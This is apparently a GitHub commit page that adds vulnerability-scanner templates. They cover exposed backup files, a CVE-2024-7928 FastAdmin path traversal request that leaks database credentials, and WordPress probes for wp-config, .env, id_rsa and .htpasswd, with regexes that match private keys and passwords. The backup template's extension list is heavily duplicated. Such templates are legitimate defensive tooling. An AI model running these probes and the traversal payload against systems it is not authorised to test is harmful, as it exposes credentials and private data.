-
Notifications
You must be signed in to change notification settings - Fork 237
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
290efb5
commit 2d685ce
Showing
8 changed files
with
414 additions
and
7 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1 +1 @@ | ||
20241103 | ||
20241104 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,140 @@ | ||
id: backup-files | ||
info: | ||
name: Backup Files Finder (information disclosure) | ||
author: Vabro | ||
severity: High | ||
description: | | ||
This template checks for common backup file extensions that may have been left exposed on a target. | ||
requests: | ||
- name: backup-files | ||
path: | ||
- "/backup" | ||
- "/backups" | ||
- "/root" | ||
- "/www" | ||
- "/public_html" | ||
- "/ht_docs" | ||
- "/files" | ||
- "/images" | ||
- "/assets" | ||
- "/media" | ||
- "/documents" | ||
- "/resources" | ||
- "/wp-content/uploads" | ||
method: GET | ||
matchers-condition: or | ||
matchers: | ||
- type: word | ||
words: | ||
- ".bak" | ||
- ".old" | ||
- ".zip" | ||
- ".tar" | ||
- ".tar.gz" | ||
- ".tar.bz2" | ||
- ".tar.xz" | ||
- ".7z" | ||
- ".rar" | ||
- ".gz" | ||
- ".bz2" | ||
- ".xz" | ||
- ".sql" | ||
- ".db" | ||
- ".bak" | ||
- ".swp" | ||
- ".swp" | ||
- ".save" | ||
- ".save" | ||
- ".sav" | ||
- ".sav" | ||
- ".copy" | ||
- ".copy" | ||
- ".backup" | ||
- ".backup" | ||
- ".orig" | ||
- ".orig" | ||
- ".old" | ||
- ".old" | ||
- ".tmp" | ||
- ".tmp" | ||
- ".temp" | ||
- ".temp" | ||
- ".test" | ||
- ".test" | ||
- ".demo" | ||
- ".demo" | ||
- ".dev" | ||
- ".dev" | ||
- ".sample" | ||
- ".sample" | ||
- ".example" | ||
- ".example" | ||
- ".backup" | ||
- ".backup" | ||
- ".config" | ||
- ".config" | ||
- ".conf" | ||
- ".conf" | ||
- ".log" | ||
- ".log" | ||
- ".txt" | ||
- ".txt" | ||
- ".doc" | ||
- ".doc" | ||
- ".docx" | ||
- ".xls" | ||
- ".xlsx" | ||
- ".ppt" | ||
- ".pptx" | ||
- ".pdf" | ||
- ".csv" | ||
- ".bak" | ||
- ".bak" | ||
- ".swp" | ||
- ".swp" | ||
- ".save" | ||
- ".save" | ||
- ".sav" | ||
- ".sav" | ||
- ".copy" | ||
- ".copy" | ||
- ".backup" | ||
- ".backup" | ||
- ".orig" | ||
- ".orig" | ||
- ".old" | ||
- ".old" | ||
- ".tmp" | ||
- ".tmp" | ||
- ".temp" | ||
- ".temp" | ||
- ".test" | ||
- ".test" | ||
- ".demo" | ||
- ".demo" | ||
- ".dev" | ||
- ".dev" | ||
- ".sample" | ||
- ".sample" | ||
- ".example" | ||
- ".example" | ||
- ".backup" | ||
- ".backup" | ||
- ".config" | ||
- ".config" | ||
- ".conf" | ||
- ".conf" | ||
- ".log" | ||
- ".log" | ||
- ".txt" | ||
- ".txt" | ||
- ".doc" | ||
- ".doc" | ||
- ".docx" | ||
- ".xls" | ||
- ".xlsx" | ||
- ".ppt" | ||
- ".pptx" | ||
- ".pdf" | ||
- ".csv" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,51 @@ | ||
id: CVE-2024-7928 | ||
|
||
info: | ||
name: FastAdmin < V1.3.4.20220530 - Path Traversal | ||
author: s4e-io | ||
severity: medium | ||
description: | | ||
A vulnerability, which was classified as problematic, has been found in FastAdmin up to 1.3.3.20220121. Affected by this issue is some unknown functionality of the file /index/ajax/lang. The manipulation of the argument lang leads to path traversal. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.3.4.20220530 is able to address this issue. It is recommended to upgrade the affected component. | ||
reference: | ||
- https://wiki.shikangsi.com/post/share/da0292b8-0f92-4e6e-bdb7-73f47b901acd | ||
- https://github.com/bigb0x/CVE-2024-7928 | ||
- https://nvd.nist.gov/vuln/detail/CVE-2024-7928 | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N | ||
cvss-score: 4.3 | ||
cve-id: CVE-2024-7928 | ||
cwe-id: CWE-22 | ||
cpe: cpe:2.3:a:fastadmin:fastadmin:1.3.3.20220121:*:*:*:*:*:*:* | ||
metadata: | ||
max-request: 1 | ||
vendor: fastadmin | ||
product: fastadmin | ||
fofa-query: icon_hash="-1036943727" | ||
tags: cve,cve2024,fastadmin,lfi | ||
|
||
http: | ||
- raw: | ||
- | | ||
GET /index/ajax/lang?lang=../../application/database HTTP/1.1 | ||
Host: {{Hostname}} | ||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
part: body | ||
words: | ||
- 'jsonpReturn(' | ||
- '"password":' | ||
- '"username":' | ||
- '"database":' | ||
condition: and | ||
|
||
- type: word | ||
part: content_type | ||
words: | ||
- 'application/javascript' | ||
|
||
- type: status | ||
status: | ||
- 200 | ||
# digest: 4a0a0047304502206a03af2bd622586d9ea3423ce05fb8c99fe1ec1940335aca969aece8642d4cf9022100e4fa51cfa54ae2d026551a9ff270d3e4c5e52c4645e364558c90b77f36d71458:922c64590222798bb761d5b6d8e72950 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,84 @@ | ||
id: wordpress-exposed-files | ||
|
||
info: | ||
name: WordPress Exposed Sensitive Files Detection | ||
author: Redflare-Cyber | ||
severity: high | ||
description: Detects potentially exposed sensitive WordPress files that may contain credentials, tokens, or PIIs, some are general and not Wordpress specific so may overlap with other similar templates. | ||
tags: wordpress, exposure, creds, | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}{{file}}" | ||
|
||
attack: clusterbomb | ||
|
||
payloads: | ||
file: | ||
- /wp-config.php{{suffix}} | ||
- /backup{{suffix}} | ||
- /database{{suffix}} | ||
- /dump{{suffix}} | ||
- /wp-config.php{{archive_ext}} | ||
- /backup{{archive_ext}} | ||
- /database{{archive_ext}} | ||
- /dump{{archive_ext}} | ||
- /wp-config-sample.php | ||
- /.env | ||
- /.git/config | ||
- /.svn/entries | ||
- /.hg/requires | ||
- /.bzr/branch-format | ||
- /.DS_Store | ||
- /debug.log | ||
- /error_log | ||
- /phpinfo.php | ||
- /composer.lock | ||
- /composer.json | ||
- /id_rsa | ||
- /id_rsa.pub | ||
- /.htpasswd | ||
- /.htaccess | ||
- /logs/access.log | ||
- /logs/error.log | ||
- /wp-content/debug.log | ||
- /wp-content/uploads/.htaccess | ||
- /wp-includes/php.ini | ||
- /php.ini | ||
- /info.php | ||
suffix: | ||
- '' | ||
- '~' | ||
- '.bak' | ||
- '.old' | ||
- '.save' | ||
- '.swp' | ||
- '.swo' | ||
- '.sql' | ||
archive_ext: | ||
- '.zip' | ||
- '.tar.gz' | ||
- '.tar.bz2' | ||
- '.tar' | ||
- '.gz' | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: status | ||
status: | ||
- 200 | ||
- 206 | ||
|
||
- type: regex | ||
part: body | ||
regex: | ||
- '(?i)(DB_(NAME|USER|PASSWORD|HOST))' | ||
- '(?i)(AUTH_KEY|SECURE_AUTH_KEY|LOGGED_IN_KEY|NONCE_KEY)' | ||
- '(?i)(FTP_(USER|PASS))' | ||
- '(?i)(<title>phpinfo\(\)</title>)' | ||
- '(?i)(repositoryformatversion|svn|openssl)' | ||
- '(?i)(-----BEGIN [A-Z ]*PRIVATE KEY-----)' | ||
- '(?i)(root:.*:(/bin/bash|/bin/sh))' | ||
- '(?i)(\$cfg\["blowfish_secret"\])' | ||
condition: or |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Oops, something went wrong.